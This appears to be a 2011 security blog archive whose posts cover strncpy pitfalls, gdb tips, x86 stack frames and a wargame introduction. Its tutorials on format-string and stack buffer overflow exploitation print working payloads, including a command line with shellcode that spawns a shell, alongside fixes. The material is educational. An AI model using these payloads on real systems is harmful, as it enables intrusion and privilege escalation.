strncpy – Is it really secure?

Posted: September 22, 2011 in Stack Smashing

A lot has already been written on this topic, but I would like to talk a bit about it. In many experts’ view, strncpy() just trades one type of bug for another, and in a sense that is true. The short and straightforward answer to the question in the title is “No!”, but let’s look at why.

  • strcpy() copies data from the source to the destination until it meets a null character ('\0') in the source. It does not check the bounds of the destination, so it can overflow a fixed-size buffer and overwrite memory locations that shouldn’t be overwritten.
  • strncpy(), on the other hand, takes a third argument: the maximum number of characters to copy, which is generally the size of the destination buffer. That stops the overflow, but if the source is at least that long, strncpy() fills the destination completely and does not append a terminating null character. (If the source is shorter, it pads the rest of the destination with null characters.) String handling functions that later use the destination buffer then have to blindly hope that the byte immediately after it is a null character. In most cases, this is not true.

So whenever strncpy() truncates, everything that later reads the buffer as a string depends on the byte immediately after it being a null character (0x0). This is not true in most cases, because local variables on the stack are laid out next to each other, so a read that runs past the end of one buffer simply continues into its neighbour. A classic example is a strcpy() call whose source string was previously filled by a (supposedly safe) strncpy() call. strcpy() copies data until a null character is met, but the earlier strncpy() never appended one, so strcpy() copies more than the source buffer holds and there is a potential buffer overflow. SmashTheStack’s IO has level6, which deals with this case specifically. I’ve also written a small writeup with hints on it.

Another example is a strncpy() call followed by a strncat() call, which in some cases is vulnerable to a buffer overflow. SmashTheStack’s IO has level8, which deals with this case, and I’ve also written a writeup on it.

Well, what do we do then?

All we can do is manually append a null character to the string once the strncpy() call is done. In order to do this, the buffer has to be one byte larger than the longest string to be stored. A secure implementation would be:

#define STRINGSIZE 5

char buf [ STRINGSIZE + 1 ];

strncpy ( buf, "abcde", STRINGSIZE );

buf [ STRINGSIZE ] = '\0';

A bit of gyan (knowledge)

The internet is maturing at an extremely fast rate, and the world-wide-web (www) has become a central hub for information available worldwide. Nowadays, communication between the far ends of the world has become trivial. The dot-com boom happened in the mid-1990s and companies have depended hugely on the internet since then. This has paved the way for a huge number of possibilities, along with risks. Companies, customers and retailers can buy and sell online, and e-commerce has become substantially important because of this.

What I’ve found is that however fast technology grows, people’s minds don’t change. No matter how secure you tend to keep your transaction between the client and server, e-commerce’s growth has not increased very much because of the constant fear in people’s minds – “How can I trust this fellow when I cannot even see him? What if I pay online but don’t get my package?”. A typical example is the huge number of credit card frauds over the decades, which has just increased the fear in people’s minds.

Each time a vulnerability is discovered on a particular website, it has been exploited and has incurred huge losses for the company hosting that website. Time and again, people have tried to keep websites as secure as possible. Theoretically, algorithms (used in security) have been proven to be secure (till date) and yet, attackers have always found ways and means to breach security.

In my opinion, it is just plain ignorance of the designer to ignore the security aspects to make his work easier. Though development of technology is rapidly increasing and we learn new things everyday, secure coding practices are not learnt in the process. This in turn leads to security holes in the implementation of software, which are then exploited by attackers causing huge losses to companies.

Let’s try to answer some simple questions:

  • How do you host webpages over the world-wide-web?
    • In most cases, web pages are accessed using the http(s) or (s)ftp protocols. If a person wants to host a website on the world-wide-web, (s)he first has to register a domain name. The domain name is then mapped to a particular IP address which is reachable from anywhere in the world (called a ‘public IP’). Next, the person has to make the website accessible from the machine having that IP address, which is generally done by running a web server on it. Now, the website is available to anyone who knows either the public IP or the registered domain name.
  • What programming language can be used while implementing the same?
    • There are a huge number of scripting languages available, which designers can use to create websites. Examples are PHP, JSP, ASP, etc. Programming constructs differ in each language, but end up doing the same things. There is also CGI (common gateway interface) where you can use scripting languages such as Python, Perl, Ruby, etc. to do the same job.
  • What should one do to make a web application secure?
    • This question cannot be answered in one paragraph. Anyway, I’ll try listing a few:
      • Firstly, it requires a good knowledge of the exact working of the code which designers write. Talking with an example, it means that knowing that “strcpy()” function copies one string to another is not enough, but rather the programmer needs to know how exactly it copies and why it is made so.
      • Secondly, the programmer who implements the software needs to have deep knowledge about secure coding practices – what, why and how. Secure coding practices try to ensure that there are minimal security holes in software being designed, thus ensuring safety, security and stability of software. Other factors such as reliability, integrity tag along if these conditions are met.

Now, based on the three questions answered above, we can come to a standpoint as to what factors determine how secure a website is. In decreasing order of importance and difficulty:

  1. Knowledge of the programmer.
  2. Network layout being used.
  3. Configurations being used in software.

We know that the only way to access a website hosted on a public IP is through the internet. Without the internet, the world-wide-web becomes a big joke. When we look at how the internet is designed, we see that networking plays a huge role. Hence, the protocols used during transfer of data have to be secure. No matter how secure the application is, if the networking protocols underneath it are insecure, security is threatened. This is one basic fact that all web designers have to understand. Most of the devices on the internet today use the 5 layer hybrid protocol stack. This protocol stack was not designed with security in mind, and is prone to MITM attacks (DNS cache poisoning, ARP spoofing, IP spoofing, etc.)

Management of a website is normally done through configuration settings. These configuration settings determine how users of the website can access data and with what level of permissions. These configuration settings for the website can be divided into two parts – configurations of web server and the configurations of the user who is accessing the website. Configurations of the web server mean those configurations which affect all users accessing the website, whereas user-specific configurations apply to single users accessing the website. An example of a web-server configuration is the “Directory Listing” option, where a user can list the contents of a directory accessible through the website, without a webpage displaying it. An example of a user-specific configuration is the access control being specified to each user, controlled by an ACL (Access Control List). Programming languages sometimes influence how these user-specific configurations are specified.

Can we make the world-wide-web ‘entirely’ secure?

A simple answer would be “Entirely secure?! I don’t think so!”. But there are a lot of factors to consider while answering this question. Let’s look at some of them.

Firstly, the programmer implementing the software has to have a good knowledge of secure coding practices. He/she has to know exactly how the code is being implemented and how secure it is. This is where programming languages play an important role. Some programming languages provide very high-level programming constructs to make the job easier for the programmer, but this actually hides the inner implementation of the constructs, and how secure they are, from the programmer. Thus security does not only rely on how the programmer codes, but also on how the code is implemented by the compiler/interpreter of that particular programming language. The programmer has to take care of this, carefully considering the programming language that is being used and how it is actually implemented.

There isn’t much that can be done about the security level of the entire protocol stack. This is because if we have to modify the protocols in the protocol stack to make it secure (below the application layer), then we would have to change the firmware in every hub, switch, router and computer all around the world. For a long time, people have been changing the protocols at the application layer to secure ones (such as SSL), trying to prevent MITM attacks at the application layer. But then we have to understand that whatever is done on the application layer is specific only to that layer. The security mechanisms used in the application layer are totally blind to attacks happening at the lower layers. Thus, if we actually would have to make the network layout totally secure, that wouldn’t be possible. But what we can do is to provide more encryption mechanisms at the application layer, hoping for the best. So from the network point of view, the world-wide-web is still insecure and will continue to be until the entire protocol stack can be made secure.

In most of today’s websites, vulnerabilities arise due to insecure configurations being used. The programmer is lazy and leaves insecure configurations on the website, paving the way for information leaks and potential exploits. Though this is relatively easy to handle when compared to the other factors, it is important when it comes to the security of a website.

What now?

The very need of security arises because of the fact – all of us are not responsible citizens. There would be no need for policemen if there were no thieves. But this is definitely not achievable, because changing hardware and software is a lot easier than changing people! There is a reason that I’ve said that “knowledge of the programmer” is more important and harder to achieve than “making the network layout secure”. What I mean is that it is easier to change all the hubs, switches, routers and computers all over the world to achieve security, than to strive to achieve that every programmer has to have the knowledge of secure coding practices! :-D

During my under-graduation, a professor had once said “It is a never-ending race between designers, attackers and security experts”. Designers keep developing technology, while attackers keep finding security holes in the implementation of that technology, and security experts try to come up with workarounds to patch these holes. This seems to be true, not only with computers, but with any technology used in this world!

We have to do our best with what we have. We know that there are attackers prowling in the wild, looking for vulnerable websites to deface, or probably steal data from. So it is our responsibility to secure our data, no matter what. We have talked about some of the factors influencing security, so we will have to look deeper into them and try to come up with an effective, yet secure implementation.

Let’s discuss a few ways of effectively using GDB while debugging programs. Though DDD aims at providing a reasonable UI for GDB, it still uses the command line interface of GDB for its work. So let’s see what options are available in GDB. There are a lot of tutorials which can be found online on this, but I wish to keep this one simple for beginners.

This is just a note on my experiences with gdb. You can look at tutorials from betterexplained.com and RMS for more features.

  • What are the prerequisites before starting to debug a program using gdb?
    • Firstly, you have to compile the program with the ‘-g’ option to provide debugging symbols for gdb. This can be done by:
      • user@host:~$ gcc program.c -o program_executable -g
    • Next, you have to run the executable under ‘gdb’. On my Ubuntu system, I normally do this with:
      • user@host:~$ gdb program_executable
  • How do I set breakpoints in the program?
    • In case of setting breakpoints in source code:
      • (gdb) break program.c:29    (set breakpoint at line number 29 of source file program.c)
      • (gdb) b program.c:29
      • (gdb) b 29 (This case is when there is only one C file compiled)
    • In case of setting breakpoints at specific addresses:
      • (gdb) break *0x8048255
      • (gdb) b *0x8048255
  • How do I disassemble only particular addresses within a program using gdb?
    • In case of disassembly of a function using its name:
      • (gdb) disas <name>
    • In case of disassembly using addresses:
      • (gdb) info line <name_of_function> (optional)
      • (gdb) disas <start_addr>,<end_addr>
  • How do I print the value of a register?
    • To see values in all registers:
      • info registers
    • To see the value in an individual register:
      • print/x <register> (register=$eax/$ebx/$ecx/$edx/$esp/$ebp/$eip/$edi/$esi)
      • x/wx <register> shows the word stored at the address held in the register, not the register itself
  • In what ways can I view the value of memory address/variable?
    • HEX:
      • x/bx <addr>         (only 1 byte)
      • x/2bx <addr>       (2 bytes)
      • x/2wx <addr>      (2 words)
    • As string:
      • x/s <addr>
    • As character:
      • x/c <addr>
    • For a variable, use &<var> as the address (an array name such as ‘buffer’ can be used directly).
  • How do I dump the stack?
    • Get 32 words from stack:
      • x/32wx $esp
  • How can I disassemble a particular instruction at a particular address?
    • At any address:
      • x/i <address>
    • The next instruction:
      • x/i $eip
  • How do I step into functions?
    • Step by source lines:
      • step (OR) s
    • Step by instructions:
      • stepi (OR) si
  • How do I step over functions?
    • Step over source lines:
      • next (OR) n
    • Step over instructions:
      • nexti (OR) ni
  • How do I continue till I meet another breakpoint?
    • continue (OR) c
  • How do I perform multiple operations with one command?
    • (gdb) define function1
    • > stepi
    • > printf "esp = 0x%x\n", $esp
    • > end
    • (gdb) function1
    • esp = 0xbfffd89c
    • (gdb)

There are a lot more advanced features that can be used; I’ll keep adding new stuff as and when I encounter it. :-)

To understand this vulnerability, you first need a thorough understanding of the stack layout.

  • What is a format string?

From my understanding (quite naive), a format string is a string which determines the format of the rest of the arguments passed to a function. In the case of C language, functions such as printf(), scanf(), fprintf(), vsprintf() take format strings as argument.

Example: printf("%d", i);      => Here, ‘%d’ is a format string which determines the format of ‘i’ (in this case, an integer).

  • What is a format string vulnerability?

A format string vulnerability is where an unsanitized input is passed to a function which is capable of taking a format string as argument. From a programmer’s perspective, this unsanitized string is assumed to be a normal string, but if given as a format string, can lead to examining values of the stack and much more.

  • What can be done by exploiting one?

By exploiting such a vulnerability, an attacker can dump the entire program’s stack, write into arbitrary memory locations and even execute custom written machine code.

Let’s take an example and proceed:

#include <stdio.h>
#include <string.h>

int main ( int argc, char **argv ) {
    char buffer[1024];

    if ( argc >= 2 ) {
        /* Copy at most 1023 characters and always terminate the string. */
        strncpy ( buffer, argv[1], sizeof(buffer) - 1 );
        buffer[sizeof(buffer) - 1] = '\0';

        printf ( buffer );   /* vulnerable: user input is used as the format string */
    }

    return 0;
}

This program should ideally print the first command line argument (at most 1023 characters) given to the program. One question we have to ask ourselves is:

  • Since the input given to the printf() function is unsanitized, what if we give a format string as argument?

Let’s analyze this a bit more. Let’s consider:

printf ( "%d", i );

Here, you can see that there are two arguments to be passed to the printf function. Now, when printf takes the first argument and parses it, it sees “%d”. There, it knows that there is a second argument which must’ve been provided and that’s an integer i. So it takes the next argument (next 4 bytes below 1st argument) from the stack (which it assumes the calling function must’ve pushed) and prints it.

Let’s take the case:

printf ( buffer );        // Here, ‘buffer’ contains "%d".

It’s clear from this that if ‘%d’ is present in buffer, printf tries to take the next argument from the stack. Now, there isn’t any argument that would’ve been pushed by the calling function, and yet printf assumes that one was pushed, takes the next word from the stack as the integer and prints it. The value which is printed is whatever happens to be there (mostly a local variable of the calling function). So, since we have the freedom to enter whatever format string we want in ‘buffer’, we have the ability to print the local variables of the calling function, and much more.

Let’s also learn about some possibilities in format strings:

  • “%p” – prints the value of the pointer provided as argument (essentially a 4 byte hex dump).
  • “%n” – stores the number of bytes written so far at the address given by the pointer provided as argument.
  • “%Nd” – prints the integer provided as argument in a field at least ‘N’ characters wide, padding it on the left with spaces if it is shorter.

So given all this and a vulnerable printf() function:

  • We can dump the values of the stack by appropriate number of %p’s.
  • We can write the number of bytes written till now into an address provided as argument using ‘%n’.
  • We can use ‘%Nd’ to control the value written into the pointer.

Coming back to our example, we know that the argument passed to printf is the starting address of the character array ‘buffer’. The memory layout is:

Stack Layout of Format String

Now, let’s see what we can put in ‘buffer’:

  • If ‘buffer’ = "abcd", nothing new will happen and the function will just print ‘abcd’.
  • If ‘buffer’ = "%p", then printf will take the next 4 bytes on the stack (part of buffer itself) as the argument and print their value.
  • If ‘buffer’ = "%nAB", then printf will treat the next argument (the first 4 bytes of ‘buffer’) as a pointer and write the number of bytes printed so far (that’s zero) to the address held in those 4 bytes. This should give a segmentation fault (SIGSEGV), as the address to be written is 0x42416e25 (‘%nAB’ read as a little-endian word) and that address is not accessible by this process.
  • If ‘buffer’ = "\x9c\xd8\xff\xbf%n", then printf will treat the next argument as a pointer and try to write 4 to it (since \x9c\xd8\xff\xbf is 4 bytes). The argument itself is 0xbfffd89c, which we assume in this case to be the address where the return address of printf is stored. If it isn’t, we debug the program, find where the return address of printf is stored and use that value instead. The program will again give a segmentation fault: when printf returns, its return address is 0x00000004 (overwritten by printf itself), and it tries to execute instructions at that address, resulting in SIGSEGV.
  • If ‘buffer’ =
    • "\x01\x01\x01\x01\x9c\xd8\xff\xbf"+
    • "\x01\x01\x01\x01\x9d\xd8\xff\xbf"+
    • "\x01\x01\x01\x01\x9e\xd8\xff\xbf"+
    • "\x01\x01\x01\x01\x9f\xd8\xff\xbf"+
    • "%10u%n%10u%n%10u%n%10u%n"

In this case, assuming that the return address occupies the 4 bytes from 0xbfffd89c to 0xbfffd89f, each ‘%10u’ consumes one of the \x01\x01\x01\x01 dummy words and each ‘%n’ consumes the address after it. The 32 bytes of dummy words and addresses are printed first, so the output count is 42 at the first ‘%n’, then 52, 62 and 72. printf therefore writes 42 (0x2a) into the first byte of the return address, 52 (0x34) into the second byte, 62 (0x3e) into the third byte and 72 (0x48) into the fourth byte. Thus the return address of printf this time is overwritten as 0x483e342a. It’ll still result in a segmentation fault, but at least we now know that we can write any arbitrary value into the return address of printf.

  • If we place some shellcode in the buffer after our format string and we know the starting address of the format string, then we can execute our own code. Let’s assume that the format string starts at address 0xbfffd8a4. The format string below is 59 bytes long (32 bytes of dummy words and addresses plus 27 bytes of format specifiers), so it ends at 0xbfffd8a4 + 59 = 0xbfffd8df and this is where our shellcode starts. Hence, we need to write this address 0xbfffd8df as the return address of printf.
    • buffer = "\x01\x01\x01\x01\x9c\xd8\xff\xbf"+
    • "\x01\x01\x01\x01\x9d\xd8\xff\xbf"+
    • "\x01\x01\x01\x01\x9e\xd8\xff\xbf"+
    • "\x01\x01\x01\x01\x9f\xd8\xff\xbf"+
    • "%191u%n%249u%n%39u%n%192u%n"+
    • "<shellcode>"

The above will write the value 0xbfffd8df into the return address of printf. Since x86 is little-endian, the lowest byte goes first. 32 bytes have already been printed when the first ‘%191u’ is reached, so 32+191 = 223 (decimal of ‘df’) will be written on the first byte of the return address. Subsequently, 223+249 = 472 = 0x1d8, whose low byte ‘d8’ lands on the second byte; 472+39 = 511 = 0x1ff gives ‘ff’ for the third byte, and 511+192 = 703 = 0x2bf gives ‘bf’ for the fourth. Each ‘%n’ stores a full 4-byte integer, so the upper bytes of each write are overwritten by the next one (and the last write spills 3 bytes past the return address).

Hence, with the above exploit, we’ll be able to execute any code we want using the format string.

How do we make our code secure?

Simple, don’t allow the user to be able to pass a format string to the function. A simple solution would be to write the format string yourself, and expect just the data from the user.

printf ( buffer );          // INSECURE

printf ( "%s", buffer );    // SECURE

Stack Memory Layout

Posted: September 18, 2011 in Background Information

Let’s first understand the memory layout of a program’s stack during execution. When a program is loaded, a virtual address space is set up for the process, and part of it is reserved for the stack. One point to note is that all the addresses we’re talking about are virtual addresses, not physical addresses. The loader maps the program into memory and does various administration stuff, and then the startup code runs (normally the _start routine in the .text section of the ELF file). The interesting part comes only when the actual program starts (that’s the main() function).

Each function, when called, sets up its own stack frame on the stack, executes, and upon finishing, gives control back to the calling function. There are three registers we have to understand properly in order to proceed:

  • EBP register: This register contains an address, which is the base address of the stack frame of the current function in execution. We call this the “base pointer”, as this signifies that this address is the base and all the memory which the executing function uses on the stack starts from here.
  • EIP register: This register holds the address of the next instruction to be executed and thus is called the “instruction pointer”.
  • ESP register: This register contains an address, which signifies the TOS (top-of-stack) of the executing function. Thus the value of “EBP-ESP” gives the size of the stack currently used by the function (the stack grows towards lower addresses, so ESP is the smaller of the two).

Now, let’s move onto how the stack frames are set up by a function when it loads. Let’s take an example where a function “A” calls another function “B”. Now, ‘A’ has to issue a “call” instruction to the starting address of function ‘B’.

A common question:

What’s the difference between a “call” instruction and a “jmp” instruction? Why can’t the calling function just say “jmp <addr>” instead of “call <addr>”?

The answer to this is quite simple. When function ‘A’ calls function ‘B’ and ‘B’ finishes executing, it must return back to the address of the instruction in ‘A’ and continue execution. Now, how does ‘B’ know the address that must be put onto EIP register so that ‘A’ can resume execution? This is done by the “call” and “ret” instructions.

Let’s say ‘A’ has the following instructions:

0x8048350 call 0x8048360 <function 'B'>

0x8048355 test eax, eax

And ‘B’ has the following instructions:

0x8048360 mov eax, 0x01

0x8048365 ret

When “call <addr>” is executed by ‘A’, the address from which execution must resume (in this case 0x8048355) is pushed onto the stack. Then ‘B’ starts executing, and after it finishes executing, the “ret” instruction pops the value from TOS into EIP, which in turn is the address of the next instruction to be executed. We call this address the return address. Now, “jmp 0x8048360” will not push the return address on the stack, and hence the system will never be able to know which instruction it has to resume execution from. Thus, we always call functions using the “call” instruction.

Before function ‘A’ calls function ‘B’, it must somehow make the arguments available for ‘B’. This is done by pushing the arguments onto the stack before the “call” instruction is made. The arguments are pushed in reverse order, since ‘B’ must be able to see argument 1 on TOS, argument 2 just below that, etc. Therefore, before ‘A’ calls ‘B’ (say 2 arguments), the following will take place:

push <argument 2>

push <argument 1>

call <B_addr>

The stack layout just as ‘B’ starts execution will be:

Stack Layout when function 'A' calls function 'B'

When function ‘A’ calls function ‘B’, the return address (from where execution has to be resumed) is pushed onto the stack, and ‘B’ starts executing. Now, ‘B’ also has to have its own stack frame. So the first 2 instructions of a function are typically:

push ebp

mov ebp, esp

These two instructions set up the stack for the called function ‘B’. The previous base pointer of function ‘A’ is saved, by pushing it onto the stack. It then sets the value of the base pointer as TOS, representing this as the bottom-of-stack for function ‘B’. All local variables of a function come on top of its base pointer, that is, at lower addresses.

Now, when the called function ‘B’ exits, it has to restore the previous value of the base pointer in register EBP (base pointer of calling function ‘A’). This is done by popping the value of TOS to the EBP register after execution of ‘B’ is finished. Hence, an instruction which you’ll typically see in a function just before it returns is:

pop ebp

NOTE: The value of addresses used in the stack decreases as the size of the stack increases. A common phrase is that the program stack grows downwards, but what it actually means is that the ‘value’ of each subsequent address in the stack keeps decreasing as the stack grows.

One of the main objectives of writing this tutorial is to show people that exploiting a buffer overflow vulnerability is NO BIG DEAL. We’re dealing with a Linux OS here, so take into consideration that some parts of the explanation will be Linux specific. Now, to the point.

  • What is a buffer overflow vulnerability?

A buffer overflow vulnerability is one where a program disregards bounds checking while copying data onto a buffer present in memory. This allows data to overflow the buffer and be copied into random addresses, thus allowing a user to write arbitrary data into memory locations which ideally should not be overwritten.

  • What can be done by exploiting one?

In most cases, the user can execute arbitrary code on the host system. What that code can do depends on the privileges the program runs with. If it runs as the root user, then voila – ANYTHING is possible! :-D

  • Is there any background knowledge needed for exploitation?

A good understanding of the memory layout during program execution along with a bit of patience and self motivation is necessary to exploit one.

Now, assuming that you’ve understood the basics of stack memory layout from the background info section, let’s move onto looking at a simple buffer overflow exploit.

Exploiting a buffer overflow

Let’s consider a sample program:

#include <stdio.h>
#include <string.h>

void print_argument ( char **argv ) {
    /* This function is vulnerable to a buffer overflow attack */
    char buffer[50];

    strcpy ( buffer, argv[1] );
    printf ( "Argument : %s\n", buffer );
    return;
}

int main ( int argc, char **argv ) {
    if ( argc >= 2 ) {
        print_argument ( argv );
    }
    return 0;
}

The above program prints the first command line argument provided to the program. Let’s examine why this program is vulnerable to a buffer overflow attack. A critical question that should be answered is:

  • What if we provide a command line argument whose length is greater than 50?

We know that the variable buffer of size 50 bytes is allocated on the stack. Below that lies the saved base pointer, and below that lies the return address, which leads back into the main() function. The outline of stack layout is given below:

Stack Layout

Now, if we provide more than 50 bytes as command line argument, the strcpy() function tries to copy all of argv[1] onto buffer, thus overflowing the buffer and overwriting the values of the saved base pointer and the return address. In an x86 32-bit system, the word size is 4 bytes. Hence, if we provide 58 bytes (50 for the buffer, 4 for the saved base pointer and 4 for the return address), we’ll successfully overwrite the value of the return address and base pointer, assuming the compiler has placed no padding between them.

When print_argument() returns, it’ll pop the saved base pointer (some random value overwritten by us) into EBP and then the “ret” instruction loads the return address into EIP. This return address is also overwritten by us, and hence we have control of where the processor must start executing the next instruction. Now, if we store some shell code (or machine code, which I’ll explain later) in the buffer, and overwrite the return address with the starting address of buffer, then the processor will start executing the contents of the buffer as if they were instructions. VOILA, we can execute whatever we want! :-D

Now, let’s write an exploit to give us a shell when we execute this program. Don’t worry if you don’t understand the exploit, there’s a lot to be learnt about shell codes and how they work before you can actually go to write an exploit. In this case, let’s assume that the address where the variable ‘buffer’ starts is 0xbfffd89c.

$ gcc printargs.c -o printargs

$ ./printargs `python -c 'print "\x90"*10 + "\x6a\x31\x66\x58\xcd\x80\x66\x89" + "\xc3\x66\x89\xc1\x6a\x46\x66\x58" + "\xcd\x80\x31\xc9\xf7\xe1\x51\x68" + "\x2f\x2f\x73\x68\x68\x2f\x62\x69" + "\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x41"*5 + "\x9c\xd8\xff\xbf"'`

sh:~$

That’s it, you’ve got a shell! :-) It’s as simple as that folks, nothing more to it! :-D

I was introduced to smashthestack.org by Zubin, my partner in crime. :-P I looked at io.smashthestack.org. At first I didn’t like it much, but then later on, it got really addictive! It has challenges starting from testing the basics of C, moving on to buffer overflows, format string vulnerabilities, etc. I am currently on level11, and I’m thinking of posting some hints on how to solve the problems.

The way the entire challenge is organized is really cool – simple, yet cool. There’s a remote Linux box, which we can access over ssh on port 2224. The password for level1 is “level1”. The password for each level is stored in the file /home/level<num>/.pass. So we need to be the user “level<num>” in the first place to access that level’s password! At first, it doesn’t look simple, but if we see the way the challenges are configured on the Linux box, it becomes easy.

$ ssh -p 2224 level1@io.smashthestack.org
level1@io.smashthestack.org’s password:
level1@io:~$ cd /levels

level1@io:/levels$ ls -l level01
-r-sr-x--- 1 level2 level1 7500 Nov 16  2007 level01
level1@io:/levels$

Here, we can see that the executable level01 is owned by user ‘level2’, has the setuid bit set, and can be executed by members of the group ‘level1’. Hence, while executing the challenge’s executable, if we’re able to get back a shell (with setuid privileges), then we are ‘level2’ in that shell! From that new shell, we can read the next level’s password and voila, we can access the next level’s executable.

This is how it basically works, and some of the challenges themselves are coded in such a way that if you’re able to do the right stuff, it gives you back a shell. It’s really interesting and addictive, so readers, if you get time and you’re interested in reverse engineering/binary analysis, this is definitely the way. :-)